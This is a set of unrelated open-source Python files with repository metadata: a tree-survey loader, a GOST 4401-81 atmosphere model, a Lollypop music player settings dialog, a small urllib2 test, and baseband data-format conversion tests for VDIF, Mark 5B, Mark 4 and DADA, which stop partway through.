'coord_utm_zone_n': row[pos_for('utm_south')],
'coord_lat': float_or_none(row[pos_for('lat')].replace(',', '.')),
'coord_lon': float_or_none(row[pos_for('long')].replace(',', '.')),
'photo': row[pos_for('fotos')],
'diameter': row[pos_for('dia')],
'height': row[pos_for('alt')],
'circ': row[pos_for('circ')],
'base_area': float_or_none(row[pos_for('areabasal')].replace(',', '.')),
'size_class': row[pos_for('clasetamano')],
'quality': float_or_none(row[pos_for('calidad')].replace(',', '.')),
'relevance': row[pos_for('relevancia')],
'notes': row[pos_for('notas')],
'phenology': row[pos_for('fenologia')],
'observation': row[pos_for('obs')],
'surveyed_on': parse(row[pos_for('fechahora')]),
}
t = Tree(**tree)
t.save()
"""
if __name__ == '__main__':
app = create_app(CONFIG)
manager = Manager(app)
with app.app_context():
load()
"""
|
icarito/arbio-azucar-adoptarbol
|
loader.py
|
Python
|
gpl-3.0
| 2,243
|
# -*- coding: utf-8 -*-
"""
* Partial implementation of standard atmospheric model as described in
* GOST 4401-81 useful for processing of data from meteorological balloon
* sensors.
*
* Supported modelling of temperature and pressure over the altitude span from
* 0 up to 51km.
*
* algorithm by Oleg Kochetov <ok@noiselab.ru>
"""
from math import log10
class GOST4401(object):
G = 9.80665
R = 287.05287
E = 6356766
MIN_PRESSURE = 6.69384
MAX_PRESSURE = 101325.00
MIN_GP_ALT = 0.00
MAX_GP_ALT = 51000.00
    # Lookup table with averaged empirical parameters for the
    # lower layers of the atmosphere, in accordance with GOST 4401-81
LUT_RECORDS = 6
tab = {
        'altitude' : 0, # Geopotential altitude
'temperature' : 1, # degrees K
'temp gradient' : 2, # degrees K per meter
'pressure' : 3, # pascals
}
ag_table = [
[0, 288.15, -0.0065, 101325.00],
[11000, 216.65, 0.0, 22632.04],
[20000, 216.65, 0.0010, 5474.87],
[32000, 228.65, 0.0028, 868.0146],
[47000, 270.65, 0.0, 110.9056],
[51000, 270.65, -0.0028, 6.69384]
]
    @classmethod
    def geopotential_to_geometric(cls, altitude):
        return altitude * cls.E / (cls.E - altitude)
    @classmethod
    def geometric_to_geopotential(cls, altitude):
        return altitude * cls.E / (cls.E + altitude)
def get_altitude(self, pressure):
"""
Returns geometric altitude value for the given pressure.
:param pressure: float pressure - pressure in pascals
:return: float geometric altitude in meters
"""
# Pressure in Pascals
if (pressure <= self.MIN_PRESSURE) or (pressure > self.MAX_PRESSURE):
return None
for idx in range(0, self.LUT_RECORDS - 1):
if ((pressure <= self.ag_table[idx][self.tab['pressure']]) and
(pressure > self.ag_table[idx + 1][self.tab['pressure']])):
break
Ps = float(self.ag_table[idx][self.tab['pressure']])
Bm = float(self.ag_table[idx][self.tab['temp gradient']])
Tm = float(self.ag_table[idx][self.tab['temperature']])
Hb = float(self.ag_table[idx][self.tab['altitude']])
if Bm != 0:
geopot_H = ((Tm * pow(Ps / pressure, Bm * self.R / self.G) - Tm) / Bm)
else:
            # Isothermal layer: H - Hb = (R * Tm / G) * ln(Ps / P), and
            # ln(x) = log10(x) / log10(e), hence the division by 0.434294.
            geopot_H = log10(Ps / pressure) * (self.R * Tm) / (self.G * 0.434294)
        return self.geopotential_to_geometric(Hb + geopot_H)
def get_pressure(self, altitude):
"""
Returns pressure in pascals for the given geometric altitude
:param altitude: float altitude - geometric altitude in meters
:return: float - pressure in pascals
"""
        geopot_H = self.geometric_to_geopotential(altitude)
if (geopot_H < self.MIN_GP_ALT) or (geopot_H >= self.MAX_GP_ALT):
return None
for idx in range(0, self.LUT_RECORDS - 1):
if ((geopot_H >= self.ag_table[idx][self.tab['altitude']]) and
(geopot_H < self.ag_table[idx + 1][self.tab['altitude']])):
break
Ps = float(self.ag_table[idx][self.tab['pressure']])
Bm = float(self.ag_table[idx][self.tab['temp gradient']])
Tm = float(self.ag_table[idx][self.tab['temperature']])
Hb = float(self.ag_table[idx][self.tab['altitude']])
if Bm != 0:
lP = log10(Ps) - (self.G / (Bm * self.R)) * log10((Tm + Bm * (geopot_H - Hb)) / Tm)
else:
lP = log10(Ps) - 0.434294 * (self.G * (geopot_H - Hb)) / (self.R * Tm)
return pow(10, lP)
def get_temperature(self, altitude):
"""
Returns temperature value in K for the given geometric altitude.
:param altitude: float altitude - geometric altitude in meters
:return: float - temperature in degrees K
"""
        geopot_H = self.geometric_to_geopotential(altitude)
if (geopot_H < self.MIN_GP_ALT) or (geopot_H >= self.MAX_GP_ALT):
return None
for idx in range(0, self.LUT_RECORDS - 1):
if ((geopot_H >= self.ag_table[idx][self.tab['altitude']]) and
(geopot_H < self.ag_table[idx + 1][self.tab['altitude']])):
break
Bm = float(self.ag_table[idx][self.tab['temp gradient']])
Tm = float(self.ag_table[idx][self.tab['temperature']])
Hb = float(self.ag_table[idx][self.tab['altitude']])
temp = Tm
if Bm != 0:
temp += Bm * (geopot_H - Hb)
return temp
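if __name__ == '__main__':
    # Illustrative self-check, not part of the original module; the printed
    # values are approximate and shown only for orientation.
    model = GOST4401()
    print(model.get_temperature(10000.0))  # ~223 K at 10 km
    print(model.get_pressure(10000.0))     # ~2.65e4 Pa
    print(model.get_altitude(26500.0))     # ~10 km (inverse of the above)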
|
Shatki/PyIMU
|
gost4401_81.py
|
Python
|
gpl-3.0
| 4,655
|
#!/usr/bin/python
# Copyright (c) 2014-2015 Cedric Bellegarde <cedric.bellegarde@adishatz.org>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import Gtk, GLib, Gio, Pango
try:
    from gi.repository import Secret
except ImportError:
    Secret = None
from gettext import gettext as _
from _thread import start_new_thread
from lollypop.define import Lp, Type, SecretSchema, SecretAttributes
from lollypop.utils import use_csd
# Lollypop settings
class Settings(Gio.Settings):
"""
Init settings
"""
def __init__(self):
Gio.Settings.__init__(self)
"""
Return a new Settings object
"""
def new():
settings = Gio.Settings.new('org.gnome.Lollypop')
settings.__class__ = Settings
return settings
"""
Return music paths
@return [str]
"""
def get_music_paths(self):
paths = self.get_value('music-path')
if not paths:
if GLib.get_user_special_dir(GLib.UserDirectory.DIRECTORY_MUSIC):
paths = [GLib.get_user_special_dir(
GLib.UserDirectory.DIRECTORY_MUSIC)]
else:
print("You need to add a music path"
" to org.gnome.Lollypop in dconf")
return paths
# Dialog showing lollypop options
class SettingsDialog:
def __init__(self):
self._choosers = []
builder = Gtk.Builder()
builder.add_from_resource('/org/gnome/Lollypop/SettingsDialog.ui')
self._settings_dialog = builder.get_object('settings_dialog')
self._settings_dialog.set_transient_for(Lp.window)
if use_csd():
self._settings_dialog.set_titlebar(
builder.get_object('header_bar'))
switch_scan = builder.get_object('switch_scan')
switch_scan.set_state(Lp.settings.get_value('auto-update'))
switch_view = builder.get_object('switch_dark')
switch_view.set_state(Lp.settings.get_value('dark-ui'))
switch_background = builder.get_object('switch_background')
switch_background.set_state(Lp.settings.get_value('background-mode'))
switch_state = builder.get_object('switch_state')
switch_state.set_state(Lp.settings.get_value('save-state'))
switch_autoplay = builder.get_object('switch_autoplay')
switch_autoplay.set_state(Lp.settings.get_value('auto-play'))
switch_genres = builder.get_object('switch_genres')
switch_genres.set_state(Lp.settings.get_value('show-genres'))
self._settings_dialog.connect('destroy', self._edit_settings_close)
builder.connect_signals(self)
main_chooser_box = builder.get_object('main_chooser_box')
self._chooser_box = builder.get_object('chooser_box')
party_grid = builder.get_object('party_grid')
#
# Music tab
#
dirs = []
for directory in Lp.settings.get_value('music-path'):
dirs.append(directory)
# Main chooser
self._main_chooser = ChooserWidget()
image = Gtk.Image.new_from_icon_name("list-add-symbolic",
Gtk.IconSize.MENU)
self._main_chooser.set_icon(image)
self._main_chooser.set_action(self._add_chooser)
main_chooser_box.pack_start(self._main_chooser, False, True, 0)
if len(dirs) > 0:
path = dirs.pop(0)
else:
path = GLib.get_user_special_dir(
GLib.UserDirectory.DIRECTORY_MUSIC)
self._main_chooser.set_dir(path)
# Others choosers
for directory in dirs:
self._add_chooser(directory)
#
# Party mode tab
#
genres = Lp.genres.get()
genres.insert(0, (Type.POPULARS, _("Populars")))
genres.insert(1, (Type.RECENTS, _("Recents")))
ids = Lp.player.get_party_ids()
i = 0
x = 0
for genre_id, genre in genres:
label = Gtk.Label()
label.set_property('margin-start', 10)
label.set_property('halign', Gtk.Align.START)
label.set_property('hexpand', True)
label.set_ellipsize(Pango.EllipsizeMode.END)
label.set_text(genre)
label.show()
switch = Gtk.Switch()
if genre_id in ids:
switch.set_state(True)
switch.connect("state-set", self._party_switch_state, genre_id)
switch.set_property('margin-end', 50)
switch.show()
party_grid.attach(label, x, i, 1, 1)
party_grid.attach(switch, x+1, i, 1, 1)
if x == 0:
x += 2
else:
i += 1
x = 0
#
# Last.fm tab
#
if Lp.lastfm is not None and Secret is not None:
self._test_img = builder.get_object('test_img')
self._login = builder.get_object('login')
self._password = builder.get_object('password')
schema = Secret.Schema.new("org.gnome.Lollypop",
Secret.SchemaFlags.NONE,
SecretSchema)
Secret.password_lookup(schema, SecretAttributes, None,
self._on_password_lookup)
builder.get_object('lastfm_grid').set_sensitive(True)
builder.get_object('lastfm_error').hide()
self._login.set_text(
Lp.settings.get_value('lastfm-login').get_string())
"""
Show dialog
"""
def show(self):
self._settings_dialog.show()
#######################
# PRIVATE #
#######################
"""
Add a new chooser widget
@param directory path as string
"""
def _add_chooser(self, directory=None):
chooser = ChooserWidget()
image = Gtk.Image.new_from_icon_name("list-remove-symbolic",
Gtk.IconSize.MENU)
chooser.set_icon(image)
if directory:
chooser.set_dir(directory)
self._chooser_box.add(chooser)
"""
Update view setting
@param widget as unused, state as widget state
"""
def _update_ui_setting(self, widget, state):
Lp.settings.set_value('dark-ui', GLib.Variant('b', state))
if not Lp.player.is_party():
settings = Gtk.Settings.get_default()
settings.set_property("gtk-application-prefer-dark-theme", state)
Lp.window.update_view()
"""
Update scan setting
@param widget as unused, state as widget state
"""
def _update_scan_setting(self, widget, state):
Lp.settings.set_value('auto-update',
GLib.Variant('b', state))
"""
Update background mode setting
@param widget as unused, state as widget state
"""
def _update_background_setting(self, widget, state):
Lp.settings.set_value('background-mode',
GLib.Variant('b', state))
"""
Update save state setting
@param widget as unused, state as widget state
"""
def _update_state_setting(self, widget, state):
Lp.settings.set_value('save-state',
GLib.Variant('b', state))
"""
Update show genre setting
@param widget as unused, state as widget state
"""
def _update_genres_setting(self, widget, state):
Lp.window.show_genres(state)
Lp.settings.set_value('show-genres',
GLib.Variant('b', state))
"""
Update auto play setting
@param widget as unused, state as widget state
"""
def _update_autoplay_setting(self, widget, state):
Lp.settings.set_value('auto-play',
GLib.Variant('b', state))
"""
Update lastfm settings
@param sync as bool
"""
def _update_lastfm_settings(self, sync=False):
if Lp.lastfm is not None and Secret is not None:
schema = Secret.Schema.new("org.gnome.Lollypop",
Secret.SchemaFlags.NONE,
SecretSchema)
Secret.password_store_sync(schema, SecretAttributes,
Secret.COLLECTION_DEFAULT,
"org.gnome.Lollypop.lastfm.login %s" %
self._login.get_text(),
self._password.get_text(),
None)
Lp.settings.set_value('lastfm-login',
GLib.Variant('s', self._login.get_text()))
if sync:
Lp.lastfm.connect_sync(self._password.get_text())
else:
Lp.lastfm.connect(self._password.get_text())
"""
Close edit party dialog
@param widget as Gtk.Window
"""
def _edit_settings_close(self, widget):
# Music path
paths = []
main_path = self._main_chooser.get_dir()
choosers = self._chooser_box.get_children()
if main_path == GLib.get_user_special_dir(
GLib.UserDirectory.DIRECTORY_MUSIC)\
and not choosers:
paths = []
else:
paths.append(main_path)
for chooser in choosers:
path = chooser.get_dir()
if path is not None and path not in paths:
paths.append(path)
previous = Lp.settings.get_value('music-path')
Lp.settings.set_value('music-path', GLib.Variant('as', paths))
# Last.fm
self._update_lastfm_settings()
self._settings_dialog.hide()
self._settings_dialog.destroy()
if set(previous) != set(paths):
Lp.window.update_db()
"""
Update party ids when use change a switch in dialog
@param widget as unused, state as widget state, genre id as int
"""
def _party_switch_state(self, widget, state, genre_id):
ids = Lp.player.get_party_ids()
if state:
try:
ids.append(genre_id)
except:
pass
else:
try:
ids.remove(genre_id)
except:
pass
Lp.settings.set_value('party-ids', GLib.Variant('ai', ids))
"""
Test lastfm connection
@param button as Gtk.Button
"""
def _on_test_btn_clicked(self, button):
self._update_lastfm_settings(True)
if not Gio.NetworkMonitor.get_default().get_network_available():
self._test_img.set_from_icon_name('computer-fail-symbolic',
Gtk.IconSize.MENU)
return
start_new_thread(self._test_lastfm_connection, ())
"""
Test lastfm connection
@thread safe
"""
def _test_lastfm_connection(self):
try:
u = Lp.lastfm.get_authenticated_user()
u.get_id()
GLib.idle_add(self._test_img.set_from_icon_name,
'object-select-symbolic',
Gtk.IconSize.MENU)
except:
GLib.idle_add(self._test_img.set_from_icon_name,
'computer-fail-symbolic',
Gtk.IconSize.MENU)
"""
Set password entry
@param source as GObject.Object
@param result Gio.AsyncResult
"""
def _on_password_lookup(self, source, result):
password = None
if result is not None:
password = Secret.password_lookup_finish(result)
if password is not None:
self._password.set_text(password)
# Widget used to let user select a collection folder
class ChooserWidget(Gtk.Grid):
def __init__(self):
Gtk.Grid.__init__(self)
self._action = None
self.set_property("orientation", Gtk.Orientation.HORIZONTAL)
self.set_property("halign", Gtk.Align.CENTER)
self._chooser_btn = Gtk.FileChooserButton()
self._chooser_btn.set_action(Gtk.FileChooserAction.SELECT_FOLDER)
self._chooser_btn.set_property("margin", 5)
self._chooser_btn.show()
self.add(self._chooser_btn)
self._action_btn = Gtk.Button()
self._action_btn.set_property("margin", 5)
self._action_btn.show()
self.add(self._action_btn)
self._action_btn.connect("clicked", self._do_action)
self.show()
"""
Set current selected path for chooser
@param directory path as string
"""
def set_dir(self, path):
if path:
self._chooser_btn.set_uri("file://"+path)
"""
Set image for action button
@param Gtk.Image
"""
def set_icon(self, image):
self._action_btn.set_image(image)
"""
Set action callback for button clicked signal
@param func
"""
def set_action(self, action):
self._action = action
"""
    Return the selected directory path
@return path as string
"""
def get_dir(self):
path = None
uri = self._chooser_btn.get_uri()
if uri is not None:
path = GLib.uri_unescape_string(uri, None)
if path is not None:
return path[7:]
else:
return None
#######################
# PRIVATE #
#######################
"""
    If an action is defined, execute it; otherwise remove the widget
"""
def _do_action(self, widget):
if self._action:
self._action()
else:
self.destroy()
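# Hedged usage sketch for ChooserWidget inside a running Gtk application;
# 'container' and the action callback are hypothetical:
#
#     chooser = ChooserWidget()
#     chooser.set_dir(GLib.get_home_dir())
#     chooser.set_icon(Gtk.Image.new_from_icon_name("list-remove-symbolic",
#                                                    Gtk.IconSize.MENU))
#     chooser.set_action(lambda: print(chooser.get_dir()))
#     container.add(chooser)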
|
yoseforb/lollypop
|
src/settings.py
|
Python
|
gpl-3.0
| 14,299
|
import urllib2
url = "http://ifolderlinks.ru/404"
req = urllib2.Request(url)
try:
    response = urllib2.urlopen(req, timeout=3)
    print response.info()
    # print response.read()
except urllib2.HTTPError as e:
    print 'The server couldn\'t fulfill the request.'
    print 'Error code: ', e.code
|
emmdim/guifiAnalyzer
|
traffic/tests/testUrl.py
|
Python
|
gpl-3.0
| 295
|
#!/usr/bin/python3
import gui
gui.main()
|
Koala-Kaolin/pyweb
|
src/__main__.py
|
Python
|
gpl-3.0
| 42
|
# Licensed under the GPLv3 - see LICENSE
import pytest
import numpy as np
import astropy.units as u
from astropy.time import Time
from .. import vdif
from .. import mark4
from .. import mark5b
from .. import dada
from ..base.encoding import EIGHT_BIT_1_SIGMA
from ..data import (SAMPLE_MARK4 as SAMPLE_M4, SAMPLE_MARK5B as SAMPLE_M5B,
SAMPLE_VDIF, SAMPLE_MWA_VDIF as SAMPLE_MWA, SAMPLE_DADA,
SAMPLE_BPS1_VDIF)
class TestVDIFMark5B:
"""Simplest conversion: VDIF frame containing Mark5B data (EDV 0xab)."""
def test_header(self):
"""Check Mark 5B header information can be stored in a VDIF header."""
with open(SAMPLE_M5B, 'rb') as fh:
# Start time kiloday is needed for Mark 5B to calculate time.
m5h1 = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
# For the payload, pass in how data is encoded.
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
# A not-at-the-start header for checking times.
m5h2 = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
# Create VDIF headers based on both the Mark 5B header and payload.
header1 = vdif.VDIFHeader.from_mark5b_header(
m5h1, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
header2 = vdif.VDIFHeader.from_mark5b_header(
m5h2, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
for i, (m5h, header) in enumerate(((m5h1, header1), (m5h2, header2))):
assert m5h['frame_nr'] == i
# Check all direct information is set correctly.
assert all(m5h[key] == header[key] for key in m5h.keys())
assert header['mark5b_frame_nr'] == m5h['frame_nr']
assert header.kday == m5h.kday
# As well as the time calculated from the header information.
assert header.time == m5h.time
# Check information on the payload is also correct.
assert header.nchan == 8
assert header.bps == 2
assert not header['complex_data']
assert header.frame_nbytes == 10032
assert header.nbytes == 32
assert header.payload_nbytes == m5h.payload_nbytes
assert (header.samples_per_frame
== 10000 * 8 // m5pl.bps // m5pl.sample_shape.nchan)
# Check that we can handle > 512 Mbps sampling rate.
header3 = vdif.VDIFHeader.from_mark5b_header(
m5h2, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps,
sample_rate=64*u.MHz)
assert header3.time == header2.time
assert header3['frame_nr'] == m5h2['frame_nr']
# A copy might remove any `kday` keywords set, but should still work
# (Regression test for #34)
header_copy = header2.copy()
assert header_copy == header2
header_copy.verify()
# But it should not remove `kday` to start with (#35)
assert header_copy.kday == header2.kday
# May as well check that with a corrupt 'bcd_fraction' we can still
# get the right time using the frame number.
header_copy['bcd_fraction'] = 0
# This is common enough that we should not fail verification.
header_copy.verify()
# However, it should also cause just getting the time to fail
# unless we pass in a frame rate.
with pytest.raises(ValueError):
header_copy.time
frame_rate = 32. * u.MHz / header.samples_per_frame
assert abs(header_copy.get_time(frame_rate=frame_rate)
- m5h2.time) < 1.*u.ns
def test_payload(self):
"""Check Mark 5B payloads can used in a Mark5B VDIF payload."""
# Get Mark 5B header, payload, and construct VDIF header, as above.
with open(SAMPLE_M5B, 'rb') as fh:
m5h = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
header = vdif.VDIFHeader.from_mark5b_header(
m5h, nchan=m5pl.sample_shape.nchan, bps=m5pl.bps)
# Create VDIF payload from the Mark 5B encoded payload.
payload = vdif.VDIFPayload(m5pl.words, header)
# Check that the payload (i.e., encoded data) is the same.
assert np.all(payload.words == m5pl.words)
# And check that if we decode the payload, we get the same result.
assert np.all(payload.data == m5pl.data)
# Now construct a VDIF payload from the Mark 5B data, checking that
# the encoding works correctly too.
payload2 = vdif.VDIFPayload.fromdata(m5pl.data, header)
assert np.all(payload2.words == m5pl.words)
assert np.all(payload2.data == m5pl.data)
        # Mark 5B data cannot be complex. Check that this raises an exception.
header2 = header.copy()
with pytest.raises(ValueError):
header2.complex_data = True
with pytest.raises(ValueError):
header2['complex_data'] = True
with pytest.raises(ValueError):
vdif.VDIFPayload.fromdata(m5pl.data.view(complex), bps=2, edv=0xab)
def test_frame(self):
"""Check a whole Mark 5B frame can be translated to VDIF."""
with mark5b.open(SAMPLE_M5B, 'rb', ref_time=Time(57000, format='mjd'),
nchan=8, bps=2) as fh:
# pick second frame just to be different from header checks above.
fh.seek(10016)
m5f = fh.read_frame()
assert m5f['frame_nr'] == 1
frame = vdif.VDIFFrame.from_mark5b_frame(m5f)
assert frame.nbytes == 10032
assert frame.shape == (5000, 8)
assert np.all(frame.data == m5f.data)
assert frame.time == m5f.time
def test_stream(self):
"""Check we can encode a whole stream."""
class TestVDIF0VDIF1:
"""Conversion between EDV versions."""
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_MWA, 'rs', sample_rate=1.28*u.MHz) as f0:
h0 = f0.header0
d0 = f0.read(1024)
kwargs = dict(h0)
kwargs['edv'] = 1
fl = str(tmpdir.join('test1.vdif'))
with vdif.open(fl, 'ws', sample_rate=1.28*u.MHz, **kwargs) as f1w:
h1w = f1w.header0
assert list(h1w.words[:4]) == list(h0.words[:4])
assert h1w.sample_rate == 1.28*u.MHz
f1w.write(d0)
with vdif.open(fl, 'rs') as f1r:
h1r = f1r.header0
d1r = f1r.read(1024)
assert h1r.words[:4] == h0.words[:4]
            assert h1r.sample_rate == 1.28*u.MHz
assert np.all(d1r == d0)
class TestMark5BToVDIF3:
"""Real conversion: Mark5B to VDIF EDV 3, and back to Mark5B"""
def test_header(self):
with open(SAMPLE_M5B, 'rb') as fh:
m5h = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
# check that we have enough information to create VDIF EDV 3 header.
header = vdif.VDIFHeader.fromvalues(
edv=3, bps=m5pl.bps, sample_shape=(1,), station='WB',
time=m5h.time, sample_rate=32.*u.MHz, complex_data=False)
assert header.time == m5h.time
def test_stream(self, tmpdir):
"""Convert Mark 5B data stream to VDIF."""
# Here, we need to give how the data is encoded, since the data do not
# self-describe this. Furthermore, we need to pass in a rough time,
# and the rate at which samples were taken, so that absolute times can
# be calculated.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fr:
m5h = fr.header0
# create VDIF header from Mark 5B stream information.
header = vdif.VDIFHeader.fromvalues(
edv=3, bps=fr.bps, nchan=1, station='WB', time=m5h.time,
sample_rate=32.*u.MHz, complex_data=False)
data = fr.read(20000) # enough to fill one EDV3 frame.
time1 = fr.tell(unit='time')
# Get a file name in our temporary testing directory.
vdif_file = str(tmpdir.join('converted.vdif'))
# create and fill vdif file with converted data.
with vdif.open(vdif_file, 'ws', header0=header,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - m5h.time) < 2. * u.ns
fw.write(data)
assert (fw.tell(unit='time') - time1) < 2. * u.ns
# Check two files contain same information.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fm, vdif.open(vdif_file,
'rs') as fv:
assert fm.header0.time == fv.header0.time
dm = fm.read(20000)
dv = fv.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
# Convert VDIF file back to Mark 5B
mark5b_new_file = str(tmpdir.join('reconverted.mark5b'))
hv = fv.header0
hm = fm.header0
# Here, we fill some unimportant Mark 5B header information by
# hand, so we can compare byte-for-byte.
with mark5b.open(mark5b_new_file, 'ws', sample_rate=hv.sample_rate,
nchan=dv.shape[1], bps=hv.bps,
time=hv.time, user=hm['user'],
internal_tvg=hm['internal_tvg']) as fw:
fw.write(dv)
with open(SAMPLE_M5B, 'rb') as fh_orig, open(mark5b_new_file,
'rb') as fh_new:
assert fh_orig.read() == fh_new.read()
class TestVDIF3ToMark5B:
"""Real conversion: VDIF EDV 3 to Mark5B."""
def test_header(self):
with open(SAMPLE_VDIF, 'rb') as fh:
vh = vdif.VDIFHeader.fromfile(fh)
header = mark5b.Mark5BHeader.fromvalues(time=vh.time)
assert header.time == vh.time
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_VDIF, 'rs') as fr:
vh = fr.header0
data = fr.read(20000) # enough to fill two Mark 5B frames.
fl = str(tmpdir.join('test.m5b'))
with mark5b.open(fl, 'ws', sample_rate=vh.sample_rate,
nchan=data.shape[1], bps=vh.bps, time=vh.time) as fw:
fw.write(data)
with vdif.open(SAMPLE_VDIF, 'rs') as fv, mark5b.open(
fl, 'rs', sample_rate=32.*u.MHz,
ref_time=Time(57000, format='mjd'), nchan=8, bps=2) as fm:
assert fv.header0.time == fm.header0.time
dv = fv.read(20000)
dm = fm.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
class TestVDIF0BPS1ToMark5B:
"""Real conversion: VDIF EDV 3, BPS 1 to Mark 5B."""
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_BPS1_VDIF, 'rs', sample_rate=8*u.MHz) as fr:
start_time = fr.start_time
data = fr.read(5000) # Just one Mark 5B frame.
fl = str(tmpdir.join('test.m5b'))
with mark5b.open(fl, 'ws', sample_rate=8.*u.MHz, nchan=data.shape[1],
bps=1, time=start_time) as fw:
fw.write(data)
fw.write(data)
with vdif.open(SAMPLE_BPS1_VDIF, 'rs',
sample_rate=8*u.MHz) as fv, mark5b.open(
fl, 'rs', sample_rate=8.*u.MHz, nchan=16, bps=1,
ref_time=Time('2018-09-01')) as fm:
assert fv.start_time == fm.start_time
dv = fv.read(5000)
dm = fm.read(5000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
dm = fm.read(5000)
assert np.all(dm == dv)
class TestMark4ToVDIF1:
"""Real conversion: Mark 4 to VDIF EDV 1, and back to Mark 4.
    Here, we need to use a VDIF format with a flexible size, since we want
to create invalid frames corresponding to the pieces of data overwritten
by the Mark 4 header.
"""
def test_header(self):
with open(SAMPLE_M4, 'rb') as fh:
fh.seek(0xa88)
m4h = mark4.Mark4Header.fromfile(fh, ntrack=64, decade=2010)
# Check that we have enough information to create VDIF EDV 1 header.
header = vdif.VDIFHeader.fromvalues(
edv=1, bps=m4h.bps, nchan=1, station='Ar', time=m4h.time,
sample_rate=32.*u.MHz, payload_nbytes=640*2//8, complex_data=False)
assert abs(header.time - m4h.time) < 2. * u.ns
def test_stream(self, tmpdir):
with mark4.open(SAMPLE_M4, 'rs', sample_rate=32.*u.MHz,
ntrack=64, decade=2010) as fr:
m4header0 = fr.header0
start_time = fr.start_time
vheader0 = vdif.VDIFHeader.fromvalues(
edv=1, bps=m4header0.bps, nchan=1, station='Ar',
time=start_time, sample_rate=32.*u.MHz,
payload_nbytes=640*2//8, complex_data=False)
assert abs(vheader0.time - start_time) < 2. * u.ns
data = fr.read(80000) # full Mark 4 frame
offset1 = fr.tell()
time1 = fr.tell(unit='time')
number_of_bytes = fr.fh_raw.tell() - 0xa88
with open(SAMPLE_M4, 'rb') as fh:
fh.seek(0xa88)
orig_bytes = fh.read(number_of_bytes)
fl = str(tmpdir.join('test.vdif'))
with vdif.open(fl, 'ws', header0=vheader0,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - start_time) < 2. * u.ns
# Write first VDIF frame, matching Mark 4 Header, hence invalid.
fw.write(data[:160], valid=False)
# Write remaining VDIF frames, with valid data.
fw.write(data[160:])
assert (fw.tell(unit='time') - time1) < 2. * u.ns
with vdif.open(fl, 'rs') as fv:
assert abs(fv.header0.time - start_time) < 2. * u.ns
expected = vheader0.copy()
expected['invalid_data'] = True
assert fv.header0 == expected
dv = fv.read(80000)
assert np.all(dv == data)
assert fv.offset == offset1
assert abs(fv.tell(unit='time') - time1) < 2.*u.ns
# Convert VDIF file back to Mark 4, and check byte-for-byte.
fl2 = str(tmpdir.join('test.m4'))
with mark4.open(fl2, 'ws', sample_rate=vheader0.sample_rate,
ntrack=64, bps=2, fanout=4, time=vheader0.time,
system_id=108) as fw:
fw.write(dv)
with open(fl2, 'rb') as fh:
conv_bytes = fh.read()
        assert len(orig_bytes) == len(conv_bytes)
assert orig_bytes == conv_bytes
class TestDADAToVDIF1:
"""Real conversion: DADA to VDIF EDV 1, and back to DADA.
Here, we use a VDIF format with a flexible size so it is easier to fit
the dada file inside the VDIF one.
"""
def get_vdif_header(self, header):
return vdif.VDIFHeader.fromvalues(
edv=1, time=header.time, sample_rate=header.sample_rate,
bps=header.bps, nchan=header['NCHAN'],
complex_data=header.complex_data,
payload_nbytes=header.payload_nbytes // 2,
station=header['TELESCOPE'][:2])
def get_vdif_data(self, dada_data):
return (dada_data + 0.5 + 0.5j) / EIGHT_BIT_1_SIGMA
def get_dada_data(self, vdif_data):
return vdif_data * EIGHT_BIT_1_SIGMA - 0.5 - 0.5j
def test_header(self):
with open(SAMPLE_DADA, 'rb') as fh:
ddh = dada.DADAHeader.fromfile(fh)
# Check that we have enough information to create VDIF EDV 1 header.
header = self.get_vdif_header(ddh)
assert abs(header.time - ddh.time) < 2. * u.ns
assert header.payload_nbytes == ddh.payload_nbytes // 2
def test_payload(self):
with open(SAMPLE_DADA, 'rb') as fh:
fh.seek(4096)
ddp = dada.DADAPayload.fromfile(fh, payload_nbytes=64000,
sample_shape=(2, 1),
complex_data=True, bps=8)
dada_data = ddp.data
# Check that conversion between scalings works.
vdif_data = self.get_vdif_data(dada_data)
assert np.allclose(self.get_dada_data(vdif_data), dada_data)
# Check that we can create correct payloads.
vdif_payload0 = vdif.VDIFPayload.fromdata(vdif_data[:, 0, :], bps=8)
vdif_payload1 = vdif.VDIFPayload.fromdata(vdif_data[:, 1, :], bps=8)
vd0, vd1 = vdif_payload0.data, vdif_payload1.data
assert np.allclose(vd0, vdif_data[:, 0, :])
assert np.allclose(vd1, vdif_data[:, 1, :])
vd = np.zeros((vd0.shape[0], 2, vd0.shape[1]), vd0.dtype)
vd[:, 0] = vd0
vd[:, 1] = vd1
dd_new = self.get_dada_data(vd)
ddp2 = dada.DADAPayload.fromdata(dd_new, bps=8)
assert ddp2 == ddp
def test_stream(self, tmpdir):
with dada.open(SAMPLE_DADA, 'rs') as fr:
ddh = fr.header0
dada_data = fr.read()
offset1 = fr.tell()
stop_time = fr.tell(unit='time')
header = self.get_vdif_header(ddh)
